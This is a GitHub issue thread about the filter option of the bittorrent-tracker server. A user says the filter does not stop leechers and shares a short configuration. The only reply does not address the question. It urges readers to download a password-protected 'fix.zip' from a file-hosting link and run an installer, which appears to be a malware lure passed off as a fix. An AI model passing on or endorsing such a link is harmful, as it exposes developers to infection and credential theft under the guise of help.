### ISSUE TITLE
Filter Feature Not Working

### ISSUE THREAD

**Issue by quocduongpy** [webtorrent/bittorrent-tracker#527]
Hello,

I have tried using the filter to block all downloads by leechers, but it has not been successful. I believe my code is correct, but it is not functioning as expected. On the leechers' machines, they can still download files being seeded.

Here is my code:

const server = new Server({
    http: true,
    udp: false,
    ws: false,
    filter: function (infoHash, params, cb) {
        return cb(new Error('disallowed torrent'))
    }
})

Thanks

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
